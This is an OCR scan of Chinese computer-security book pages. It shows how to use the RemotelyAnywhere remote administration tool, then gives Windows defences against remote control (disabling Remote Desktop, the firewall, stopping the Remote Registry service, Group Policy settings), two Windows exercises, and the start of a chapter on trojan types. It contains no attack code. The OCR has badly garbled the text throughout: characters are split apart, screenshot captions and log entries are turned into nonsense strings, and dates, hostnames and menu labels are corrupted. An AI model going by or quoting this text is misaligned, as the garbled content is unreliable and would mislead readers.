指 二 此 才 清 保持 开交 的 期 限 - 
吧 ~ > 


疏 件 人 格 姑 何 对 此 计算 机 访问 RemotelyAnywhere? 
[htps//DESKTOP-RJKNMOC:2000 


| | 
辆 地 i# 享 x 
已 创建 洲 请 
人 9 过 已 创建 交 成 
和 开 在 可 以 格 下 而 未 的 URL 发 送 络 收 件 人 。 


hepsWDESKTOP-RJKNMOC:2000/invite/su2lafeerxqhmnz73kiykeprjmznole0 


县 抽 单 二 可 以 格 六 清 复制 到 基 由 页 . 


电子 部 件 单 二 可 以 语 动 协 有 提请 的 电子 邮件 客户 羔 , 


< 上 > 加 i 


[sep 国 单 击 左 侧 列表 中 “聊天 ”选项 ， 通 过 
右 侧 窗 格 可 以 与 被 管 设备 聊天 ， 一 般 被 管 设 
备 很 少 有 人 在 ， 所 以 该 功能 用 得 比 较 少 。 


ER 王 到 


国 oesrrop RNMOCydriniamater -区 天 - RemorslyAnywhere EE 


[EEC 


让 一 六 || 憩 | 上 | 


x | CJ 


[step 图 选择 左 侧 列表 中 的 “计算 机 管理 ”一 
“用 户 管理 器 ”选项 ， 在 右 侧 “用 户 管理 
器 ” 窗 格 中 显示 了 远程 主机 的 用 户 和 组 信息 ， 
单 击 “ 添 加 用 户 ” 按 钮 可 以 为 远程 主机 增加 
用 户 ， 同 时 可 以 单 击 用 户 名 对 其 进行 编辑 。 
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记 月 户 管理 器 ] 


EGR vi -| 


[7 EE 
tea 


i 


FR 


选择 左 侧 列表 中 的 “计算 机 管理 ”一 
“事件 查看 器 ”选项 ， 在 右 侧 窗 格 中 显示 
了 “事件 查看 器 ” 窗 格 ， 通 过 该 窗 格 可 以 
查看 远程 主机 的 事件 信息 。 
Ea 事件 址 看 姥 (应 用 程序 ) 
中 AE mE | 


阳 户 区 二 有 机 


| 916 ESENT MA 20191211 13.46 | DESKTCP-RJKNNOC 


也 1001 Wncows Emor Reporing NA (2018/12/1 13:45 DESKTCP-RJKNNOC 
@ 000 Applcaton Enor ws 201812n 13:43 DEsIcPRuCwoc 
了 | 916 ESENT NA (2018/12/1 13:43 DESKTCF-RJKNNOC 
日 205 RemasyAnwnere SYSTEM 2018/12n 1339 DESKTCP-RJONNOC 


‘202 RomctoV/Anwnhore 
D102 RometoyAnywnere 
110 RometoyAnwhore 
102 RometoVAnywnore 
D100 RometovAnywhore 
101 RemateyAmwhere 

105 RometoyAnywhore 
500 RometoyAnywhoro 
102 RometoyAnywhoro 


2018/121 13:37 | DESKTCP-RJONOC 
201912111333 | DESKTCP.RJKNMOC 
201912111332 | DESKTCP.RJKNMOC 
01812111330| DESKTCP-RJANNOC 
20191211329| DESKTCFRJKNOC 
01812111329| DESKTCP-RJONOC 
20191211329| DESKTCF-RJKNNOC 
2018/12/ 13:29 | DESKTCP RJANNOC 
2018/12/ 13:27 DESKTCP RUKNNOC 
NA 2018/12/1 13:26 | DESKTCP RJANNOC 
NA 2018/12/ 13:25 DESKTCF RUKNNOC 
Adminiotrator 2018/12/1 13:25 , DESKTCP-RJANNOC 


加 选择 左 侧 列表 中 的 “计算 机 管理 ”一 
“服务 ”选项 ， 在 右 侧 窗 格 中 显示 了 “ 服 
务 ” 窗 格 ， 通 过 该 窗 格 可 以 查看 远程 主机 
所 有 的 服务 项 ， 也 可 以 单 击 这 些 服务 项 进 
行 启动 、 禁 用 和 删除 等 操作 。 


[2 
六 IDF eI 
”| 第 1 页 360 孙 考 时 防护 名 束 季 务 
名 入 一 
360 东 毒 3 防护 加 并 务 
Aetvex Inetallor hnstsV) 
Adove Genuine Somwara neorm seee 
Adobe OwichEoard 
Alcyn Router Sennce 
App Readiness 
Apphection dan 而 
Apphcston ntormaten 
Appcalon Lner Galeway Senice 
Apphcation Managemert 
AppX Deploymant Sonice JAPEXSVC] 
Assionedaccesshanager 有 
AVCTP 肌 务 
Background Ineligent Tr 
Background Tasks nraetu 
Base Filenng Enoine 


1033 Moiinotallor 


DALIT EE 
pe 


Cad dad da dadd adda 


Block Leval Backup Engin Sonice 
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[step 园 选择 左 侧 列表 中 的 “计算 机 管理 ”一 
“进程 ”选项 ， 在 右 侧 窗 格 中 显示 了 “ 进 
程 ” 窗 格 ， 通 过 该 窗 格 可 以 查看 远程 主机 
所 有 的 进程 ， 单 击 PID 为 1016 的 进程 。 


Es 进程 
x 
层次 结构 < /可 执行 文件 上 | 
System ldle Process 

4 System 

96 Registm 

rr 

we 

76 | ee 

744 wininit exe 

3848 Semvices exe 
到 988 CWwindows\system32\svchost exe 
1016 CWindows\System32IWUDFHost exe 
到 380 CWMINDOWS'system32\svchost exe 
|] 6436 CWINDOWS\system32wbem\nsecapp.exe 
呈 6648 CWINDOWS\system32wbemiwmipvse.exe 
中 | 4512 CiiWindows\System32\InputMethod\CHS\ChsIME exe 
本 8136 CiWindows\SystemApps\InputApp_cw5n1h2byewy\Windowsinternal. Com 
| 7136 CWindows\SystemApps\Microsofl Windows.Cortana_cw5n1h2byewy\Se; 
到 8120 CWindows\System32\RuntimeBroker.exe vv 
a 8444 CWindows\System32\RuntimeBroker. exe > 
step 贺 弹出 新 界面 ， 显示 出 进程 1752 的 进 


程 名 为 Runtime Broker.exe， 同 时 还 显示 
了 该 进程 的 其 他 信息 ， 通 过 修改 “优先 级 
类 ”下 拉 列 表 选 项 可 以 调整 该 进程 的 优 
先 级 别 ， 可 以 为 需要 优先 执行 的 进程 做 
调整 。 


WUDFHost.exe 


-全 
ao 
间 坑 [ 线 量 | Du [打开 文件 正本 使用 的 注册 表 项 


说 明 -i 驱动 程序 基础 -用 户 模式 驱动 程序 框架 主机 


版 本 :6.02.17134.0001 
进程 ID: 1016 


优先 绢 类 :| 正常 ”VY 
类 型 Senice 

用 户 帐户 NTAUTHORITYLOCAL SERVICE 

父 PlD:a48 

父 名 : services exe 

司 柄 计数 :243 
线程 :8 

页 面 错误 计数 :2308 


工作 集 大 小 贬值: 8.568.00 KB 

工作 集 大 小 : 5.904 00 KB 

mt We 2.05200 KB 

页 面 文件 使 用 情况 1.900 00 KB 

总 内 存 使 用 情况 :7.804.00 KB 
命令 行 : CYWindowsSystem32WUDFHostexe 


[step 图 选择 左 侧 列表 中 的 “计算 机 管理 ”一 
“注册 表 编 辑 器 ”选项 ， 在 右 侧 窗 格 中 显 
示 了 “注册 表 编 辑 器 ” 窗 格 ， 通 过 该 窗 格 
可 以 查看 远程 主机 的 注册 表 信 息 。 


[a 注册 表 编辑 器 


四 区 XI| 
显 bEskrop-RKNMoc 
四 外 ney cusses oor 
-HKEY_CURRENT_USER 
BS HkEY LocAL MAcHINE 
OY pcpoooooo00 
外 HARDWARE 


secunmy 
sorwAane 
血 加 svsTeM 
mY hkey_useps 
mY hkey_cuRRENT coONFIG 


选择 左 侧 列表 中 的 “计算 机 管理 ”一 
“重新 引导 选项 ”， 在 右 侧 窗 格 中 显示 了 
“重新 引导 选项 ” 窗 格 ， 通 过 该 窗 格 可 以 
根据 需求 对 远程 主机 做 各 种 引导 操作 ， 只 


需要 单 击 指定 的 图 标 按钮 就 可 以 。 
-要 重新 引导 选项 
二 和 | 


重新 自动 RemoteyAnywhers 
Romoloe 和 于 

DT 0 和 后 河和 
生生 由本 


天 党 重新 引号。 
所 而 序 关 半 所 有 进程 并 重新 引导 运程 其 机 


二 紧急 重 六 引导 
下 允许 应 用 程序 和 其 他 进程 正常 毕 止 ， 因 此 您 可 能 竺 失 未 保存 的 炎 握 * 但 是 Windows 和 档 正常 关 
闲 ， 并 将 所 有 未 完成 的 六 件 操作 刷新 王 磋 盘 。 


ee 
二 新 引号 。 此 过 项 不 思 许 Windows 正常 殷 止 ， 因 此 爷 可 能 扫兴 不 保 让 和 谤 对 大 。 单 ; 
a - 栏 )， 因 此 您 不 会 从 i 


安全 醒 式 重新 引导 
在 启用 网 络 的 情况 下 ， MA 安全 模式 是 在 系统 出 现 凡 Windows 正常 
操作 的 严重 问题 时 ，Windows 的 桂 牢 00 载 方式 : 


划 的 重 : 
© bt 如 重新 引号 不 是 非常 当 名 并 日 可 以 在 春 几 秆 
时 间 进 行 时 ， 此 种 方式 岂 很 有 用 
此 定 用 于 重新 启动 后 自动 壁 录 主 机 的 蕉 所 


选择 左 侧 列表 中 的 “计算 机 设置 ”一 
“环境 变量 ”选项 ， 在 右 侧 窗 格 中 显示 了 
“环境 变量 ” 窗 格 ， 通 过 该 窗 格 可 以 修改 
远程 主机 的 环境 变量 信息 ， 通 过 单 击 指定 
环境 变量 选项 进行 调整 。 
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[step 回 选择 左 侧 列表 中 的 “计算 机 设置 ”一 
“虚拟 内 存 ” 选 项 ， 在 右 侧 窗 格 中 显示 了 
“虚拟 内 存 ” 窗 格 ， 通 过 该 窗 格 可 以 修改 
远程 主机 的 不 同 磁盘 驱动 器 提供 虚拟 内 存 
的 数量 ， 建 议 不 要 选择 C 盘 ， 总 量 设置 为 物 
理 内 存 的 1.5 倍 ， 单 击 “ 应 用 ”按钮 使 配置 
生效 。 


大. 虚拟 内 存 
空 四 
最 小 [ET I] 
ES Me Me 25,198.66 MB 
wo MB MB 5015293MB 
> MB MB 139.229.14 MB 
z 00 90 00 
允许 的 最 小 值 : 200MB 
推荐 人 6.007.42 NB 


通过 RemotelyAnywhere 还 可 以 配置 个 
别 主机 的 配置 ， 例 如 FTP、 活 动 目录 。 不 过 
该 功能 一 般 不 建议 使 用 。 


[本 抽 山 引 


[Step 图 在 左 侧 选 项 列表 中 选择 “计划 与 警 
报 ” 选 项 ， 该 选项 下 有 两 个 子 选 项 ， 分 
别 是 “电子 邮件 警报 ”和 “任务 计划 程 
序 ”。 通 过 “电子 邮件 警报 ”选项 可 以 监 
视 系统 接收 的 电子 邮件 信息 ， 对 垃圾 邮件 
等 有 安全 成 胁 的 信息 提供 警报 提示 ， 通 过 
“任务 计划 程序 ”选项 可 以 为 系统 配置 任 
务 计 划 。 


41 


yer | 
= EEEES 


在 左 侧 选项 列表 中 选择 “性 能 信 
息 ” 一 “CPU 负载” 选项 ， 在 右 侧 显示 
“CPU 负载 ” 窗 格 ， 该 窗 格 显示 了 CPU 的 使 
用 情况 图 表 ， 从 下 方 列 表 中 可 以 看 到 各 个 
进程 的 CPU 使 用 情况 。 


在 左 侧 选项 列表 中 选择 “性 能 信 
息 ” 一 “驱动 器 与 分 区 信息 ”选项 ， 在 右 
侧 显示 “驱动 器 与 分 区 信息 ” 窗 格 ， 该 窗 
格 显示 了 远程 主机 磁盘 分 区 情况 ， 以 及 各 
个 分 区 的 状态 信息 ， 在 其 中 可 以 单 击 指定 
分 区 进行 分 区 调整 。 


驱动 器 与 分 区 信息 
= 


SE | a 


Ean 0: woc wbsoooszucoererAo (es 0 1D 9 LUN 0) 


step 国 在 左 侧 选项 列表 中 选择 “安全 ”一 
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“访问 控制 ”选项 ， 在 右 侧 显示 “访问 控 
制 ” 窗 格 ， 通 过 该 窗 格 可 以 设置 部 分 访问 
控制 内 容 ， 如 为 特定 用 户 指定 访问 权限 。 
配置 完成 后 ， 单 击 “ 应 用 ”按钮 生效 。 


攻关 固有 元 全 全 和 站 限 可 | 

NT 局 埠 浊 二 名 | 

在 cece 中 借用 户 名 加 

渤 洒 寿 各 站 史册 志 站 

孝公 单 上 如 不“ 记 卫 取 用 RemoleyAnwnhere 法 大 加] 


[Ea 


[step 图 在 左 侧 选 项 列表 中 选择 “安全 ”一 
“IP 地 址 锁定 ”选项 ， 在 右 侧 显示 “IP 地 
址 锁定 ” 窗 格 ， 通 过 该 窗 格 可 以 对 非法 访 
间 远 程 主机 的 地 址 进行 锁定 操作 ， 主 要 通 
过 “拒绝 服务 过 滤器 ”和 “验证 攻击 过 滤 
器 ”两 项 来 完成 配置 。“ 拒 绝 服务 过 滤 
器 ”根据 对 服务 器 HTTP 无 效 请 求 数 进行 IP 
地 址 锁定 ，“ 验 证 攻击 过 滤器 ”根据 对 服 
务 器 无 效 验证 数 进 行 IP 地 址 锁定 ， 超 出 阀 值 
的 按照 规定 时 间 锁 定 地 址 。 


民 Piehta 


生动 加 
NE HTP 本 和 [150 ] 
区 J eat 
I 
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[step 图 在 左 侧 选 项 列表 中 选择 “安全 ”一 
“IP 过 滤 ” 选 项 ， 在 右 侧 显示 “IP 过 滤 ” 窗 
格 ， 通 过 单 击 右 侧 窗 格 的 “添加 ”按钮 ， 
可 以 为 远程 服务 器 添加 IP 过 小 策略 ;选择 配 
置 好 的 配置 文件 ， 单 击 “使 用 配置 文件 ” 
按钮 ， 可 以 使 该 项 IP 过 滤 策 略 生效 。 


EE 


和 
DO 


3.5 


远程 控制 的 防护 策略 


要 想 使 自己 的 计算 机 不 受 远程 控制 入 
侵 的 困扰 ， 就 需要 用 户 对 自己 的 计算 机 进 
行 相 应 的 保护 操作 了 ， 如 关闭 自己 计算 机 
的 远程 控制 功能 、 安 装 相应 的 防火 墙 等 。 


3.5.1 关闭 Windows 远 程 桌面 功能 


关闭 Windows 远 程 桌面 功能 是 防止 黑客 
远程 入 侵 系统 的 首要 工作 ， 具 体 的 操作 步 
又 如 下 。 
右键 单 击 桌 面 上 的 “计算 机 ”图 标 ， 
在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ， 
打开 “系统 属性 ”对 话 框 。 


村 过 性 x 


计算 所 名 硬 外 。 高级 。 对 统 年 护 运 企 
加 
问 如 证 还 各 区 过 搂 这 计算 HIR) 
EFALD 


FRV. 


云 忆 上 机 

二 汪 下 二 萝 , 希 后 拓 二 全 可 这 过- 
口 不 允 作 远 全 过半 到 比 计算 WUDI 

Pe 


回 仅 允许 运 行使 网 次 级 中 月 从 验证 交 二 皇上 而 和 计算 机 过 过 建 江 ) 
[0 


过 EE 


Ce ww | 
[step 图 取消 勾 选 “允许 远程 协助 连接 这 台 计 
算 机 ” 复 选 框 ， 选 中 “不 允许 远程 连接 到 
此 计算 机 ” 单 选 按钮 ， 然 后 单 击 “确定 ? 
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按钮 ， 即 可 关闭 Windows 系 统 的 远程 桌面 
功能 。 
守 基 机 各 硬件 。 高 受 系统 保护 运程 
a 


吉 关 启用 下 人 办 芭 的 信息 


远 训 而 


和 a 一 个 入 项 ,的 后 揪 定 冯 可 以 过 按 ， 


加 不 尼 许 远程 过 到 比 半 可 D) 


为 了 更 好 地 进行 网 络 安全 管理 ，wWin_ 评 
dows 操 作 系统 特意 为 用 户 提供 了 防火 墙 功 


达到 防范 攻击 、 保 护 系统 安全 的 目的 。 

使 用 Windows 自 带 防火 墙 的 具体 操作 步 
又 如 下 。 
[step 回 在 “控制 面板 ”窗口 中 双击 “Windows 
防火 墙 ” 图 标 项 ， 打 开 “Windows 防 火 墙 ” 
对 话 框 ， 在 该 对 话 框 中 会 显示 此 时 Windows 


防火 墙 已 经 被 开启 。 
办 Wndow WX 类 - DO x 
个 者 ，35 瑞 贡 ， 所 三 二 本 硬 ， Windows 区 炎 过 ~ 用 ” 


rm Rs BEM II swept) 
重用 Windows 防火 壕 来 帮 盈 保护 你 的 电 及 


2 


Windows 办 大量 站 起 Ea 


es 


Na 和 
mn = ms 
wore Windows 队 汉 才 上 四 FBj 表 可 
= 
Rs， 


step 图 若 单 去 “允许 程序 或 功能 通过 Windows 
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器 防火 墙 ” 链接 ， 在 打开 的 窗口 中 可 以 设置 
哪些 程序 或 功能 允许 通过 Windows 防 火 墙 访 
2 问 外 网 。 


Ee] =- 6 
二 ~ 个 节 ”Windows 辽 炎 十 ， 记 放风 可 二 vO aes 户 


| 2 sas) a5 In wom 
允许 应 用 通过 Windows 防火 墙 进行 通信 
和 玫 直 机 元 认 扩 应 局 各 计生 本 太 
人 


若 单 击 Step01 中 的 “更 改 通知 设置 ” 
或 “启用 或 关闭 Windows 防 火 墙 ” 链接 ， 在 
打开 的 窗口 中 可 以 开启 或 关闭 防火 墙 。 


| 网 Rv - 口 x 


+ 个 蛤 “Windows.. ，S 赴 义 设置 v 晶 。 幸 本 定西 Pp 


文件 |] 六 纺 EE) 全 看 V) 工具 TT 才 芭 IH) 


自 定义 各 类 网 络 的 设置 
人 可 以 修改 更 用 的 每 种 类 型 的 网 次 的 防火 寺 设 于 
专用 网 颖 年 
加 @ 镀 windowimea 
口 是 所 有 传人 和 连接 旬 括 位 于 作 许 应 用 列表 中 的 应 用 
Windows 防火 江阴 止 新 语 用 时 明天 多 
Lx) 口 关闭 Windows 防火 地 [不 准 各 ) 
| 全 用 网 8 重 
四 图 居 用 Windows 防火 增 
口 曲目 所 有 传 入 笑 接 ， 旬 括 位 于 作 许 应 用 列表 中 的 应 用 
Windows 肪 六 外 新 站 用 时 误 知 多 


Lx) 口 关 闭 Windows 防火 二 [不 礁 和 ) 


Bm 
若 单 击 Step01 中 的 “高 级 设置 ” 链 
接 ， 进 入 “高 级 安全 Windows 防 火 墙 ” 窗 
口 ， 在 其 中 可 以 对 入 站 、 出 站 、 连 接 安全 
等 规则 进行 设置 。 
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3.5.3 ”关闭 远程 注册 表 管 理 服务 


远程 控制 注册 表 主 要 是 为 了 方便 网 络 
管理 员 对 网 络 中 的 计算 机 进行 管理 ， 但 这 
也 给 黑客 入 侵 提供 了 方便 。 因 此 ， 必 须 关 
闭 远程 注册 表 管 理 服务 ， 具 体 的 操作 步骤 
如 下 。 

[sep 国 在 “控制 面板 ”窗口 中 双击 “管理 工 
具 ” 选 项 ， 进 入 “管理 工具 ”窗口 。 


加 = | ETI 具 = 十 - 这 
EZ := := =s e 
个 萄 。 和 六 ， 人 管理 [ 遇 。 。”v 书 | 六 过 六 于 T 具 | 站 
和 名 和 ~ 
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| 名 isCsl RE 
人 网 oe8c 娄 各 枯 32 伺 ) 
v es 富 oD8C 数 后 源 [654 位 
末 Windows 内 存 涌 新 
3D 艰 -4 
. 避 本 安全 生路 
本 本 种 如 8 清 坚 
i: 种 生生 于 
四 xz 可 全 
如 三 皖 识 股 安 全 Windows Defender 防火 塌 
小 下 未 sn 你 复 3 动 器 
CPE: 时 NE 
入 Windows (C) 人 DES Me 


19 人 机 


[ssp 图 从 中 双击 “服务 ”选项 ， 打 开 “ 服 
务 ” 窗 口 ， 在 其 中 可 看 到 本 地 计算 机 中 的 
所 有 服务 。 
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[step 图 在 “服务 ”列表 中 选中 “Remote 
Registry” 选 项 并 右 击 ， 在 弹出 的 快捷 菜 
单 中 选择 “属性 ”选项 ， 打 开 “Remote 
Registry 的 属性 ”对 话 框 。 

[GE 国 单 二 “停止 ”按钮 ， 即 可 打开 “服务 
控制 ”提示 框 ， 提 示 Windows 正 在 尝试 启动 
本 地 计算 上 的 一 些 服务 。 


Remote Registry 的 大 全 培 各) x 


| 逢 办 。 要 录 “做 友信 让 关系 


服务 名 称 : RemoteRegistry 
2 称 : Remote Registry 
| mk: | 便民 用 户 放 SS 改 此 计算 机 上 的 注册 表 没 置 . 如果 此 最 入 
务 术 终止， 只 有 此 计算 和 上 的 用 疡 才能 禾 改 注册 表 . 如 
可 执行 文件 的 关 径 ; 
CAWINDOWS\system32\svchost.exe -kocalService 
启动 并 (E): | 目 二 ~ 
服务 类 态 : :5 
启动 (S) 售 tm 昔 这 四 焦 慨 [R 


尖 从 此 处 启动 服务 时 ， 你 可 指定 所 适用 的 启动 参数 . 


确定 取 油 应 所 [A) 


服务 控制 X 
Windows 正在 辩 试 停止 本 地 计算 机 上 的 下 列 服务 ~ 


Remote Registry 


关闭 (OQ 


在 服务 启动 完毕 后 ， 返 回 到 “Remote 
Registry 的 属性 ”对 话 框 中 ， 此 时 可 看 到 
“服务 状态 ”已 变 为 “已 停止 ”， 单 击 
“确定 ”按钮 ， 即 可 完成 “允许 远程 注册 
表 操 作 ” 服 务 的 关闭 操作 。 


Remote Registry 的 属性 (本 地 计算 机 x 


常规 。 登录 恢复。 依存 关系 


ss 

星 示 名 称 : Remote Registry 

擅 述 : | 使 远程 用 户 能 少 改 此 计算 机 上 的 注册 表 设 置 。 如 果 此 最 入 
务 衬 终 止 ， 只 有 此 计算 和 上 的 用 广 才 能 修改 注册 表 。 如 no 

可 执行 文件 的 路 径 ; 

CAWINDOWS\system32\svchost.exe -k localService 

启动 关 型 (E): 可 用 ~ 

服务 头 志 : 已 停止 

启动 [5) 和合 止 [TD 暂 分 fp) 族 短 IR] 
当 从 此 处 启动 服务 时 ， 你 可 措 定 所 适用 的 启动 参数 . 


EE EN 
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3.6 ”实战 演练 


实战 演练 1 一 一 禁止 访问 控制 面板 


黑客 可 以 通过 控制 面板 进行 多 项 系统 右 
的 操作 。 用 户 若 不 希望 他 们 访问 自己 的 控 
制 面板 ， 可 以 在 “本 地 组 策略 编辑 器 ” 窗 
口中 启用 “禁止 访问 控制 面板 ”功能 ， 具 
体 的 操作 步骤 如 下 。 

[step 图 打开 “本 地 组 策略 编辑 器 ”窗口 ， 
在 其 中 依次 展开 “用 户 配置 ”一 “管理 模 
板 ” 一 “控制 面板 ”项 ， 即 可 进入 “控制 
面板 ”的 设置 界面 。 


fID， SN EEM 和 RH 
和 中 | 出 辣 了 目 台 | 了 


> \rR/ 


[step 图 右 去 “禁止 访问 “控制 面板 ”和 PC 
设置 ”选项 ， 在 快捷 菜单 中 选择 “编辑 ” 
选项 ， 或 双击 “禁止 访问 “控制 面板 ”和 
PC 设置 ”选项 。 


文 析 中。 盘 f(A) 。 查 震 [V) 。 痢 且 HH) 
加 中 | 页 丽 | 轧 回 品 | 了 


[sep 图 打开 “禁止 访问 “控制 面板 ”和 PC 
设置 ”对 话 框 ， 在 其 中 选中 “已 启用 ” 单 
选 按钮 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 完成 禁 
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止 控制 面板 程序 文件 的 启动 ， 使 得 其 他 用 
户 无 法 启动 控制 面板 。 此 时 还 会 将 “ 开 
始 ” 菜 单 中 的 “控制 面板 ”命令 、Windows 
资源 管理 器 中 的 “控制 面板 ”文件 夹 同时 
删除 ， 彻 底 禁 止 访问 控制 面板 。 
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时 用 记 关 沁 从 上 下 请 的 “属性 ”项 总括 一 全 酉 并 , 则 入 
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mA 


站 更 实战 演练 2 一 一 启用 和 关闭 快速 启动 功能 


点 ”使 用 系统 自 带 的 “启用 快速 启动 ” 功 
能 ， 可 以 加 快 操作 系统 的 开机 启动 速度 。 
启用 和 关闭 快速 启动 功能 的 具体 操作 步 又 
如 下 。 

Eee 国 单 直 “ 开 始 ” 按 钮 ， 在 打开 的 “ 开 
始 屏幕 ”中 选择 “控制 面板 ”选项 ， 打 开 
“所 有 控制 面板 项 ”窗口 。 


国 新 和 控制 面 本 项 


日 
» x 


+ 个 国 起 和 可 所 有 辽 加 页 ~ br 
六 从 和 六 生生 二 看 W。 工具 站 才 和 H) 


调整 计算 机 的 设 羡 Et AEE~ 


图 oa suis 加 ”Realtek 高 二 电 主 需 六 于 乱 


[ 凯 RemoteApp 和 守 硬 壬 雪 由 Windows Defender 
吐 windows 扩 二 名 去 全 作 5 维护 


财 40ERIWindows 7 他 全 sion 能 


ee 名 由 na 多 间 
个 mn i 全 个性 化 
息 工交 # 夫 名 eIa 


step 较 单 去 “电源 选项 ”图 标 ， 打 开 “ 电 源 
选项 ”设置 界面 。 
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[step 图 单 击 “ 选 择 电源 按钮 的 功能 ” 超 链 
接 ， 打 开 “ 系 统 设置 ”窗口 ， 在 “关机 
设置 ”区 域 中 色 选 “启用 快速 启动 ( 推 
荐 ) ” 复 选 框 ， 单 击 “ 保 存 修改 ”按钮 ， 
即 可 启用 快速 启动 功能 。 
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[step 园 如 果 想 要 关闭 快速 启动 功能 ， 则 可 以 
取消 勾 选 “ 启 用 快速 启动 (推荐 ) ” 复 选 
框 ， 然 后 单 击 “保存 修改 ”按钮 即 可 。 


全 sa 
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练习 1: 开启 系统 “上 帝 模式 ” 


“上 帝 模式 ”， 即 God Mode， 或 称 为 
“完全 控制 面板 ”， 是 Windows 10 操 作 系 
统 中 隐藏 的 一 个 简单 的 文件 夹 窗口 ， 但 它 
包含 了 几乎 所 有 Windows 操 作 系统 的 设置 ， 
用 户 只 需 通 过 这 一 窗口 就 能 实现 所 有 的 操 
控 。 下 面 介绍 如 何 打开 该 窗口 。 

Estee 车 在 束 面 上 创建 一 个 文件 天 ， 按 F2 键 ， 
将 其 重 命名 为 “God Mode.{ED7BA470- 
8E54-465E-825C-99712043 E01C}”， 单 击 
桌面 任意 位 置 完成 命名 ， 即 可 看 到 该 文件 
夹 变 为 “God Mode” 命 名 的 图 标 。 
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God Mode| 


{ED7BA470 
-8E54- 
465E- 
825C- 

99712043E0 


双击 God Mode 图 标 ， 打 开 God Mode 
窗口 ， 即 可 看 到 该 窗口 包含 了 各 种 系统 设 
置 选项 和 工具 ， 而 且 清 晰 明了 。 双 击 任 
意 选项 ， 即 可 打开 对 应 的 系统 设置 或 工具 
窗口 。 
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f 国 


组 如 ~ a 
和 人 
入 全 加 


BitLocker 驱动 器 加 密 (1) 
信 OneDrive 


~ 加 ke 
0 
国 视 页 
加 图片 
到 六 析 
量 人 TE 
小 下 和 
国生 
和 Windows C) 
= 多 件 (D9 
= IE 


莲 风 各 


加 


210 人 项目 
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练习 2: 开启 系统 “平板 模式 ” 
Windows 10 新 增 了 一 种 使 用 模式 一 一 


平板 模式 ， 它 可 以 使 你 的 计算 机 像 平板 电 加 和 


脑 那 样 被 使 用 。 开 启 “ 平 板 模式 ”的 具体 呈 6 
操作 步骤 如 下 。 


Eee 国 单 去 桌面 右 下 角 通 知 区 域 中 的 “ 通 
知 ”图 标 ， 在 弹出 的 窗口 中 单 击 “ 平 板 模 
式 ”图 标 。 


返回 桌面 ， 即 可 看 到 系统 桌面 变 为 平 
板 模式 ， 可 拖 慢 鼠标 进行 体验 。 


[step 图 如 有 果 电 脑 支 持 触 屏 操作 ， 则 体验 效 
果 更 佳 。 若 要 退出 平板 模式 ， 则 再 次 单 击 
“平板 模式 ”图 标 即 可 。 
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第 4 音 ” 电 脑 木 马 的 防护 策略 


木马 攻击 是 黑客 最 常用 的 攻击 方法 ， 会 影响 网 络 和 计算 机 的 正常 运行 ， 而 且 其 危害 程 
度 越 来 越 严重 ， 主 要 表现 为 对 计算 机 系统 有 强大 的 控制 和 破坏 能 力 ， 如 窃取 主机 的 密码 、 
控制 目标 主机 的 操作 系统 和 文件 等 。 本 章 介绍 电脑 木马 的 防护 策略 ， 主 要 内 容 包 括 木马 的 
常用 手段 、 木 马 的 自我 保护 方式 、 木 马 的 启动 方式 及 如 何 清除 电脑 木马 等 。 


4.1 什么 是 电脑 木马 


在 计算 机 领域 中 ， 木 马 是 一 类 恶意 程 
序 ， 具 有 隐藏 性 和 自发 性 等 特性 ， 可 被 用 
来 进行 恶意 行为 的 攻击 。 

4.1.1 常见 的 木马 类 型 

木马 又 被 称 为 特洛伊 木马 ， 它 是 一 种 
基于 远程 控制 的 黑客 工具 ， 在 黑客 进行 的 
各 种 攻击 行为 中 ， 木 马 都 起 到 了 开路 先锋 
的 作用 。 一 台 计算 机 一 旦 中 了 木马 ， 就 变 
成 了 一 台 “ 俐 偏 机 ”， 对 方 可 以 在 目标 计 
算 机 中 上 传 下 载 文 件 、 偷 窥 私人 文件 、 偷 
取 各 种 密码 及 口令 信息 等 ， 可 以 说 ， 该 计 
算 机 的 一 切 秘密 都 将 暴露 在 黑客 面前 ， 隐 
私 将 不 复 存在 。 

随 着 网 络 技术 的 发 展 ， 现 在 的 木马 可 
谓 形形色色 ， 种 类 繁多 ， 并 且 还 在 不 断 增 
加 ， 因 此 ， 要 想 一 次 性 列举 出 所 有 的 木马 
种 类 ， 是 不 可 能 的 。 但 是 ， 从 木马 的 主要 
攻击 能 力 来 划分 ， 常 见 的 木马 主要 有 以 下 
几 种 类 型 。 


1. 网 络 游戏 木马 


由 于 网 络 游戏 中 的 金币 、 装 备 等 虚拟 
财富 与 现实 财富 之 间 的 界限 越 来 越 模 糊 ， 因 
此 ， 以 盗 取 网 络 游戏 账号 和 密码 为 目的 的 木 
马 也 随 之 发 展 泛滥 起 来 。 网 络 游戏 木马 通常 
采用 记录 用 户 键盘 输入 、 游 戏 进程 、API 函 
数 等 方法 获取 用 户 的 密码 和 账号 ， 窃 取 到 的 
信息 一 般 通 过 发 送 电子 邮件 或 向 远程 脚本 程 


序 提交 的 方式 发 送 给 木马 制作 者 。 


2. 网 银 木马 


网 银 木马 是 针对 网 上 交易 系统 编写 的 
木马 ， 其 目的 是 盗 取 用 户 的 卡号 、 密 码 等 
信息 。 此 类 木马 的 危险 非常 直接 ， 受 害 用 
户 的 损失 也 更 加 惨重 。 

网 银 木马 通常 针对 性 较 强 ， 木 马 制作 
者 可 能 首先 对 某 银行 的 网 上 交易 系统 进行 
仔细 分 析 ， 然 后 针对 安全 薄弱 环节 编写 病 
毒 程序 。 例 如 “网 银 大 盗 ” 木 马 ， 在 用 户 
进入 银行 网 银 登 录 页 面 时 ， 会 自动 把 页 面 
换 成 安全 性 能 较 差 、 但 依然 能 够 运转 的 老 
版 页 面 ， 然 后 记录 用 户 在 此 页 面 上 填写 的 
卡号 和 密码 。 随 着 网 上 交易 的 普及 ， 受 到 
外 来 网 银 木 马 威胁 的 用 户 也 在 不 断 增加 。 


3. 即时 通信 软件 木马 


现在 ， 即 时 通信 软件 百花 齐 放 ， 如 
QQ、 微 信 等 ， 而 且 网 上 聊天 的 用 户 群 也 十 
分 庞大 ， 常 见 的 即时 通信 类 木马 一 般 有 发 
送 消息 型 与 盗号 型 。 

(1) 发 送 消息 型 木马 : 通过 即时 通 
信和 软件 自动 发 送 含 有 恶意 网 址 的 消息 ， 目 
的 在 于 让 收 到 消息 的 用 户 单 击 网 址 激活 木 
马 ， 用 户 中 木马 后 又 会 向 更 多 好 友 发 送 木 
马 消息 。 此 类 木马 常用 技术 是 搜索 聊天 窗 
口 ， 进 而 控制 该 窗口 自动 发 送 文 本 内 容 。 

(2) 盗号 型 木马 : 主要 目标 在 于 即时 
